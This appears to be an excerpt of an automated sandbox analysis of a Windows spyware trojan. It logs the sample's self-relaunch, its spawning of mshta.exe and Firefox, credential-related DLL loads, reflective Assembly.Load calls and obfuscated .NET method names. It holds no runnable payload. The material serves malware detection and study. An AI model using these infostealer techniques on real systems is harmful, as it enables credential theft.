Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A635E0	9_2_00A635E0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A7BB60	9_2_00A7BB60
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_037FE386	9_2_037FE386
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_037FE79C	9_2_037FE79C
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_037FE4A4	9_2_037FE4A4
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_037FCBA3	9_2_037FCBA3
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_037FD908	9_2_037FD908

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: String function: 014B5130 appears 58 times
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: String function: 0146B970 appears 250 times
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: String function: 014C7E54 appears 110 times
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: String function: 014FF290 appears 105 times
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: String function: 014EEA12 appears 86 times
Source: C:\Windows\SysWOW64\mshta.exe	Code function: String function: 034AF290 appears 105 times
Source: C:\Windows\SysWOW64\mshta.exe	Code function: String function: 03477E54 appears 101 times
Source: C:\Windows\SysWOW64\mshta.exe	Code function: String function: 0349EA12 appears 86 times
Source: C:\Windows\SysWOW64\mshta.exe	Code function: String function: 0341B970 appears 250 times
Source: C:\Windows\SysWOW64\mshta.exe	Code function: String function: 03465130 appears 58 times

Source: MmF9tcIj1J.exe, 00000000.00000000.1225581960.00000000009AA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNEOn.exe4 vs MmF9tcIj1J.exe
Source: MmF9tcIj1J.exe, 00000000.00000002.1287664509.000000000A460000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs MmF9tcIj1J.exe
Source: MmF9tcIj1J.exe, 00000000.00000002.1277546651.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs MmF9tcIj1J.exe
Source: MmF9tcIj1J.exe, 00000004.00000002.1507065834.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMSHTA.EXED vs MmF9tcIj1J.exe
Source: MmF9tcIj1J.exe, 00000004.00000002.1507208063.000000000156D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs MmF9tcIj1J.exe
Source: MmF9tcIj1J.exe, 00000004.00000002.1507065834.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMSHTA.EXED vs MmF9tcIj1J.exe
Source: MmF9tcIj1J.exe	Binary or memory string: OriginalFilenameNEOn.exe4 vs MmF9tcIj1J.exe

Source: MmF9tcIj1J.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MmF9tcIj1J.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Lc4bZFGNdITBykgft4.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, Lc4bZFGNdITBykgft4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Lc4bZFGNdITBykgft4.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, Lc4bZFGNdITBykgft4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, YR3UhFBCAwxsjWMigU.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Lc4bZFGNdITBykgft4.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Lc4bZFGNdITBykgft4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/11

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MmF9tcIj1J.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\MmF9tcIj1J.exe "C:\Users\user\Desktop\MmF9tcIj1J.exe"
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process created: C:\Users\user\Desktop\MmF9tcIj1J.exe "C:\Users\user\Desktop\MmF9tcIj1J.exe"
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Process created: C:\Users\user\Desktop\MmF9tcIj1J.exe "C:\Users\user\Desktop\MmF9tcIj1J.exe"	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.MmF9tcIj1J.exe.3c8a7e8.4.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, YR3UhFBCAwxsjWMigU.cs	.Net Code: crFF3w1J41 System.Reflection.Assembly.Load(byte[])
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, YR3UhFBCAwxsjWMigU.cs	.Net Code: crFF3w1J41 System.Reflection.Assembly.Load(byte[])
Source: 0.2.MmF9tcIj1J.exe.478bb48.1.raw.unpack, YR3UhFBCAwxsjWMigU.cs	.Net Code: crFF3w1J41 System.Reflection.Assembly.Load(byte[])
Source: 0.2.MmF9tcIj1J.exe.3caa808.3.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C7D48C push esi; iretd	0_2_04C7D48F
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C7AB5C push E80571EFh; retf	0_2_04C7AB61
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_0514D5D0 push eax; iretd	0_2_0514D5D1
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00402020 push cs; ret	4_2_0040202C
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00405025 push es; iretd	4_2_00405026
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0041490A push edx; iretd	4_2_0041490E
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00403190 push eax; ret	4_2_00403192
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00426AE3 push ds; iretd	4_2_00426A6B
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00426AE3 push edi; iretd	4_2_00426BE1
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00411AFB push ebx; retf	4_2_00411B01
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_004082AF pushfd ; retf	4_2_004082B8
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0041A54F pushfd ; iretd	4_2_0041A560
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0041A553 pushfd ; iretd	4_2_0041A560
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0041A561 push esi; iretd	4_2_0041A564
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040D573 push ecx; ret	4_2_0040D574
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0041661A push edi; retf	4_2_00416620
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00405EB7 push 0000000Eh; iretd	4_2_00405EC1
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0144225F pushad ; ret	4_2_014427F9
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014427FA pushad ; ret	4_2_014427F9
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014709AD push ecx; mov dword ptr [esp], ecx	4_2_014709B6
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0144283D push eax; iretd	4_2_01442858
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03CFEB22 push 0000000Eh; iretd	8_2_03CFEB2C
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D0F285 push edi; retf	8_2_03D0F28B
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D061DE push ecx; ret	8_2_03D061DF
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D131CC push esi; iretd	8_2_03D131CF
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D131BA pushfd ; iretd	8_2_03D131CB
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D0A766 push ebx; retf	8_2_03D0A76C
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D00F1A pushfd ; retf	8_2_03D00F23
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D0D575 push edx; iretd	8_2_03D0D579
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03CFDC90 push es; iretd	8_2_03CFDC91
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034209AD push ecx; mov dword ptr [esp], ecx	9_2_034209B6

Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, NPTeZCbRKhuUjAUPpq.cs	High entropy of concatenated method names: 'KeqSaeZBNs', 'XQISWepXBl', 'GbFywDL68G', 'aMTytr0BXu', 'vKWSDlCbto', 'XbZSqXeNXJ', 'gE5S2tgeba', 'Tr5STMLxDO', 'b7wSuosA84', 'rAfSOADSGP'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, s4O5lkhFhKnR0JUHmQ.cs	High entropy of concatenated method names: 'EP53tiE3M', 'aSb5Ueb4i', 'hPM6gHyxd', 'JgmJTfF1v', 'eQ0YZVkbE', 'Ps6oI2d4h', 'VCRPA6PPweXo60HXwU', 'VQVdMynylCABJdNA2R', 'r0hy28YZw', 'TVXfwxcT5'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, rP38Rc8XiSxQ5kvdiU.cs	High entropy of concatenated method names: 'UUNQRumY88', 'npEQkvGDHL', 'xvfQjrbfvM', 'EOtQmh1O0L', 'OQRQKZYlrx', 'gsoQ0IPXdD', 'bRFQNW6BXx', 'PJnQ7k1X1c', 'AGjQLxNdxi', 'nPKQVIlfFb'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Gd76mDWZKpqfwPKmka.cs	High entropy of concatenated method names: 'jiLflDRYaW', 'F91fA5X2Pw', 'aqAf4ZIymE', 'qgRfCZAh86', 'xxrfQagSAV', 'dvhfBDGeAx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, TYyClyOeXd3w466CEj.cs	High entropy of concatenated method names: 'ToString', 'EqhsDnZ36N', 'svosk7HlOm', 'M3CsjGwTAg', 'mtjsmqF49r', 'VcAsKF7OGV', 'IKps0bk4YM', 'XwcsNZNLxe', 'B1Rs7DMnjs', 'HXrsLWjb2w'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Fruk7QkrUMaigfoKyg.cs	High entropy of concatenated method names: 'fX0jxgEKSRXxMw51B47', 'APW4YcEsLVnmFn8Vnso', 'Cvi4ynjcbt', 'eLX4QaxyCG', 'yZH4fuVppd', 'G9TRH2EU4r7Ji4V6qaC', 'rgNQ9LE02EraIKYatYe'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, RknYeUtF7jZHMvrA5KU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'riOiQsjtwA', 'k21iffJ91Q', 'RMdiviFsGZ', 'H5IiikM4Kj', 'DpQiIIu1ZX', 'oJpicUDkc9', 'TOAin4ymt9'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, V9Jx9IFC23Jbc4pNda.cs	High entropy of concatenated method names: 'DgNtCc4bZF', 'KdItBTBykg', 'sRYtPf9OEe', 'orLtd9WZNp', 'n3ptHmKexr', 'xA0tslMhYQ', 'o4FpZRGNijQxxwwe7K', 'vL0P9vcmKlqvaBQ2t1', 'wrxttwUfyF', 'tW4tMNKYFq'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, cRFNdgTmP0eY04ienr.cs	High entropy of concatenated method names: 'vAUHVv0445', 'zvsHqSi3Sk', 'furHTAZFxm', 'lKJHuRvpJf', 'NYRHkOrGRK', 'iqSHjVm40h', 'rsCHmlB2MU', 'wRbHKEPtAs', 'vw7H0BQuM0', 'hVTHNOnFma'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, ijjPIXLRhmcgw3Y6Ch.cs	High entropy of concatenated method names: 'BWuCpyoqd9', 'mhlCXa1nGi', 'PBtC3o5LZJ', 'fAhC5RCxmg', 'UHYCZsGlpf', 'FQHC6YTMK6', 'Br1CJAaUSI', 'efBCGwB138', 'EAUCY6iTp7', 'FYuCoC8KhZ'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Lc4bZFGNdITBykgft4.cs	High entropy of concatenated method names: 'OElxTgpFnU', 'MD0xutKMsh', 'eVQxOCJ7kl', 'lkNxrTZpoG', 'GDTxgiEtE6', 'xBkxbfe5qO', 'IZwx1QGgJk', 'N0gxaTiQTf', 'bP0x8j51WC', 'KQYxWrFAk9'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, nxSi3fYRYf9OEeerL9.cs	High entropy of concatenated method names: 'irCl528wcZ', 'yl7l6tMrNv', 'vEslGrTm0q', 'tn4lY9BAH9', 'TvslHWFBW2', 'BIxlsC7fA3', 'I7olSYe3dt', 'vyhly38eyk', 'luDlQrZ3EB', 'G4Olfh1IH6'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, YZNps8ofNIeare3pmK.cs	High entropy of concatenated method names: 'c6VAZsP06F', 'hMeAJAudMO', 'Dm1ljdcsUZ', 'KHWlmfQW7a', 'X9jlK9sZVs', 'Jvpl08sLb7', 'fcXlNU0LVn', 'kj3l7ERb4Y', 'rs9lLsTIDC', 'ocplVHb3ZR'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Vgce4pttdJNiloW91AN.cs	High entropy of concatenated method names: 'LDcfW6XhRy', 'gmnfzofaTZ', 'kO6vwgDKKM', 'N63vtkMYPt', 'qBNvhyp9JU', 'EA1vMBuoU2', 'qNZvFtJ7Qv', 'jUyvUsvEUM', 'hRRv9quFdT', 'qW2vxybINx'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, Fn31Uxr7qZiuLg14s4.cs	High entropy of concatenated method names: 'CQJSPZLWD0', 'dAnSd6HI2w', 'ToString', 'LYnS9G5abo', 'mt5SxnpV7V', 'xiMSlWjWKX', 'bt5SAZUxLb', 'RqJS4Kaie5', 'Vb7SC31nmE', 'QO0SBsoVco'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, MeK5j51KK7Zo9MYpfs.cs	High entropy of concatenated method names: 'QplQHqJJpK', 'pslQSaY6EE', 'NO2QQYEqdn', 'BNrQv3kKpF', 'bFDQIqDgOI', 'H5SQnHAN8M', 'Dispose', 'uaay9gRpGp', 'rSryx9u70g', 'uCYylq7ibG'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, cd5UL2xGpTyZLdPmf9.cs	High entropy of concatenated method names: 'Dispose', 'MZot89MYpf', 'Fqkhk2wUDU', 'FcijwEfmkc', 'ppWtWAenl9', 'rnftzioPPq', 'ProcessDialogKey', 'G9QhwP38Rc', 'yiShtxQ5kv', 'niUhhRd76m'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, OxVokS2EHy4Z6aRHLG.cs	High entropy of concatenated method names: 'RTQeGLoIuP', 'vhceYFbZRZ', 'HeMeRoR3I4', 'obwekpxrAI', 'nh5emA60rd', 'o9teKN8Ykj', 'ewweNl5Mth', 'BHNe7NXsQV', 'AfGeVaYR6B', 'IaieDoTH44'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, VvMa2YtMfAErLVpMR9W.cs	High entropy of concatenated method names: 'CPTvWHGvac', 'QVKvzvqmMX', 'sMxiwJyh7O', 'W55JfOj8NTNRrDfGu8F', 'YJqmppjrCKwqVsGAIoS', 'E4t56ZjGnQfynsMmbNp', 'vQvdqojcIu7BrB8aTZ1', 'aB3g2djz2tyxV4dYUGu'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, nxrpA0RlMhYQGDbFB5.cs	High entropy of concatenated method names: 'TYP4UnuSod', 'zx14xVL18O', 'iGB4ABKp8N', 'Gqs4CPZQl7', 'rwn4BKBMZI', 'qwKAg0ayQU', 'LCRAbuOP5J', 'a55A1t9lQn', 'UxZAaZ2tvN', 'Yt2A8OnA8a'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, YR3UhFBCAwxsjWMigU.cs	High entropy of concatenated method names: 'A57MUq6rVO', 'mjfM9KAmTL', 'QgvMxsYWwY', 'gb1Mlsnbjc', 'KQrMA6cg9u', 'AY2M4UWPPG', 'vFBMCfFvVh', 'cbAMBJ168K', 'xYmMElyDG1', 'bMvMPtNlX6'
Source: 0.2.MmF9tcIj1J.exe.4701128.2.raw.unpack, yFqoYQzcZERJEEHrlC.cs	High entropy of concatenated method names: 'RE1f6KE7eZ', 'BeafGPK59m', 'RAgfY7nmGg', 'ruMfRdV2GA', 'zHAfkePlDm', 'hq3fmYP6u1', 'GKYfKRlgRh', 'WmffnyDJmo', 'AdGfpQIBKg', 'il6fXp6twb'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, NPTeZCbRKhuUjAUPpq.cs	High entropy of concatenated method names: 'KeqSaeZBNs', 'XQISWepXBl', 'GbFywDL68G', 'aMTytr0BXu', 'vKWSDlCbto', 'XbZSqXeNXJ', 'gE5S2tgeba', 'Tr5STMLxDO', 'b7wSuosA84', 'rAfSOADSGP'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, s4O5lkhFhKnR0JUHmQ.cs	High entropy of concatenated method names: 'EP53tiE3M', 'aSb5Ueb4i', 'hPM6gHyxd', 'JgmJTfF1v', 'eQ0YZVkbE', 'Ps6oI2d4h', 'VCRPA6PPweXo60HXwU', 'VQVdMynylCABJdNA2R', 'r0hy28YZw', 'TVXfwxcT5'
Source: 0.2.MmF9tcIj1J.exe.a460000.6.raw.unpack, rP38Rc8XiSxQ5kvdiU.cs	High entropy of concatenated method names: 'UUNQRumY88', 'npEQkvGDHL', 'xvfQjrbfvM', 'EOtQmh1O0L', 'OQRQKZYlrx', 'gsoQ0IPXdD', 'bRFQNW6BXx', 'PJnQ7k1X1c', 'AGjQLxNdxi', 'nPKQVIlfFb'
